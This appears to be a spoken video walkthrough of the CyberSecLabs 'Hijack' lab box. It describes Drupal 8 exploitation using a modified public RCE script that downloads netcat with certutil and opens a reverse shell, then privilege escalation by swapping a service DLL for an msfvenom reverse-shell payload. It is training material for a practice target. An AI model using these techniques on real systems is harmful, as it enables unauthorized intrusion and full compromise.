Alright, hello everybody, and today we'll be doing Hijack from CyberSecLabs. It's a really nice box that we can do, so let's just start and we can try to ping it to see if it's up. And we do see that it's up, so why don't we start with an nmap scan. So we can run a service version scan and a basic script scan, and we'll just let that run and see what shows up. Okay everybody, it looks like it's done. We can try to take a look at this. So let's go up. Okay, looks like it has an Apache server running, and it might be running on Drupal 8. So we can try to look for some exploits there. Maybe a robots.txt. We see SMB open. We can try to take a look at that as well. But let's just run enum for Linux against that real quick. Okay, doesn't look like it's gonna work, so yeah, we can try to manually look for any shares, but I don't think any's gonna be open. Yeah, this looks like there's nothing much there. Looks like that is a MySQL server. Looks like that's about it. So why don't we check out that little web server it has. Welcome to Hijack, and we can see powered by Drupal. We can see a login. Let's try admin. Try admin password. Okay, I'll search. I don't know. Follow the user guide. It looks like this just takes us to the Drupal website. Why don't we run a directory busting tool against it? We can just do dirsearch -u for URL. It's the link. We can do capital E for all extensions. -x 400 500 to get rid of those error codes. We can also do recursive, and threads we can do 100 and see if we can find anything there. Let's see. And what else we got? Just look at it. So why don't we head over to exploit database and we can just take a look at this. You can see it, Drupal's already here because I was searching that up. So yeah, we do see Metasploit right here. We see some other ones. Doesn't look like it has that verified thing. Authenticated. Avatar uploader. Let's see what else. Metasploit. Looks like it has some Metasploit modules that we can check out. So we have some more. Remote code execution. Okay. Some other ones. Remote code execution, proof of concept. Okay, we can also take a look at that. Some more. Doesn't look like this fits us because of the version. Because if we come back over here, we have Wappalyzer. If you guys don't have that, you guys can just search up Wappalyzer Firefox. It's an extension. It'll tell you what this website might be running on. We can see Apache 2.4.37. Drupal 8, so we know it's on Drupal 8. And these look like they're just for 7, and yeah, so we can take a look at these two. But let's just come back and see if dirsearch found anything. Whoa. Okay. Yeah. These don't look that interesting. I don't know what those are, but okay. So we can take a look at these two. Looks like this is a Ruby, so yeah, we can just take a look at the other one. Looks like it is a Python one. CV 2018. Looks like it's gonna ask you for the URL, and then yeah, why don't we come back over here? Try to download it. Alright, so we can just download this one here. So why don't we just download that? And as we can see, it's right here. So we'll move this over to our walkthrough directory, and we can just go over to the walkthrough directory. So why don't we check this out? Okay, we can just fire it off and see what happens. Just to see if it works. So, oops. Python 3 and that. And as for enter target URL, you can grab that over here, and we can just run that. And it says not exploitable. So why don't we actually take a look at the script and see what it's actually doing. It looks like, okay, so over here you can see that it's actually doing an echo command, and it's putting it into a file called hello.txt. But over here it's checking if I think if the hello.txt is there or not. That probably won't give us a shell anyways, so we can just try to put in our own thing. So first let's we can do a different type of command. We can just do, why don't we get our netcat.exe, so our netcat static binary, and we can try to like get a shell that way. So instead of doing the echo command, we can just try to do cert-util url cache -f http://10.10.098 on port 80. It's called netcat.txt. If you guys don't have this, I'll leave in the link in the description. So netcat.exe, and we can call it netcat.exe once it's actually there. As for these, I don't think we'll need these, so we can just get rid of this. And that should work. So why don't we save this? Okay, and we can go over here to our opt directory. We can just do pyweb, which starts up a web server for us, and we can put that in there. You can see if it grabs the, and you can see it does grab the netcat.exe. So that worked. Now what we can try to do is actually try to run it. So why don't we edit this again, and this time instead of just downloading the file, we can try to execute it. So it should be netcat.exe-ecmd.exe, and it's RIP, and it's a port, so we can just do 6969. So what this will do is pretty much Netcat on Windows, and what it does is it connects to our IP address on this port, and we'll be listening on our machine. So it'll give us a reverse shell. So we can just save that. Over here, what we can do is we can just do netcat lnvp 6969, and then we can just run this script again, and we can just put in the URL. And as you can see, we just received a shell. So if we do who am I, you can see we are hijack Jack. Okay, so we're Jack. So why don't we head over to, let's find out. Okay, so why don't we go over to users, dir, cd Jack, cd desktop. You can see that's your access flag right there. So why don't we do some privilege escalation. We can upload winPEAS. So let's head over here to our opt folder, and we just start a pyweb. And why don't we head over to cd temp. Okay, and we can just upload winPEAS. So we can do cert-util url cache -f http://10.10.098 on port 80, and we can grab winPEAS.exe. We'll call winPEAS.exe. As you can see, winPEAS is uploaded successfully, so we can just run winPEAS, and we can see what shows up. So red's good. We should check out the red. Okay, so it's running through a lot of things. Okay, why don't we head it back up to the top and see what are some of the things it's saying. So we can head all the way up. Okay, so looks like there might be some things that Windows is vulnerable to, some kernel exploits, but I don't think that's gonna work, and we can try that last if nothing else works. We can just keep looking through all these. Okay. Ooh, so we're able to impersonate a user. So that's good. We can try to like go on Metasploit and impersonate a user. We can also see some possible DLL hijacking. That's just our Netcat though. Over here we can see some more. some services, I guess. Nope. Let's just keep going down. Okay, so why don't we come back up here and try to look at the services. So there are some, let's go up. Okay, so services information. We can try to see if there's anything here, but if we look back up, okay, we already looked at that. Alright, so let's look at the services. Possible DLL hijacking. No quotes in space detected. Okay, so that's good. We could be able to privilege escalate with that. Same over here. So why don't we check out this program files hijack.exe. So we'll just copy this. CD, and we'll go over here to hijack. Let's see if we can put anything in this folder. hi.txt. Okay, we can't put anything in this folder. Program files, we can try to echo hi.txt. Looks like it's not there either. Why don't we come back to the main directory and see if we can upload anything here. hi.txt. Okay, and that doesn't give us anything either, so I don't think we'll be able to do that. No spaces and quotes. We can there is a way to privilege escalate with that, but it looks like that won't work here. Where is it? Let's go back up. We can try DLL hijacking. We saw a couple of those. So why don't we actually go back over here and CD into this. We can try to see if there's anything there. So CD. We can try to go into libraries, see what's in here. Okay, and there is a DLL. So we see custom.dll, so we can try to do some DLL hijacking here. We can try to replace this custom.dll with our own DLL that we generate from MSF Venom, and we could try to get a shell through that. So why don't we do SC query, and I think it was called hijack. So we can stop it. And once we replace the DLL, we can try to start the service, and then it'll run our DLL. So why don't we do that? We can just try to come over here, CD, walkthrough. Let's come back over here to pentest.ws. And we come over here to Venom Builder. And oops, nope, not that. Come on, don't be so slow. Okay, there we go. Windows interpreter reverse TCP. Oops, reverse TCP. And that's our IP address. We can change the port to 9696. As you can see, I already did this earlier, so it's set to DLL and the out file to custom.dll. So why don't we copy this command, paste that in here, and we can also start up MSF console to start a multi-handler. So why don't we do that? Okay, looks like it's done. Okay, so we can try to delete this and see if that works. Delete custom.dll there, and you can see that we can try to like put a file here, and you can see that it does work. So so yeah, we can try to upload this. We can start PyWeb, so it just starts up our Python server. So we do cert-util url cache -f http://10.10.098 on port 80 custom.dll, and once it's here we can call it custom.dll. Okay, looks like it successfully worked. Why don't we come back over here? We can try to use multi-handler. So let's listen on that port. We can see, oops, show options, set payload to be Windows interpreter reverse TCP. Oops, spelled it wrong. Oh man, I spelled it wrong again. Okay, did that work? And it did work. Okay, so why don't we set our L host to be 10.10.098, which is just our ton0 address. So the L port we can do 9696 because we set that earlier. So we just do run. So it's listening. Why don't we now try to start the service? So once it starts the service, it'll run the DLL. So we can just try to sc start, and it was called hijack. And we have an interpreter session. Okay, that's great. Get UID. We're NC authority system, so we successfully rooted this machine. We can come over here to users, CD administrator, CD desktop, and you can see your system right there. So you guys can go grab that. So yeah, I hope you guys enjoyed this video, and hope you guys enjoyed this box. It was really nice to do. If you guys did like this, then please drop a like and consider subscribing. There will be a lot more videos to come. So yeah, until then, I'll see you guys later.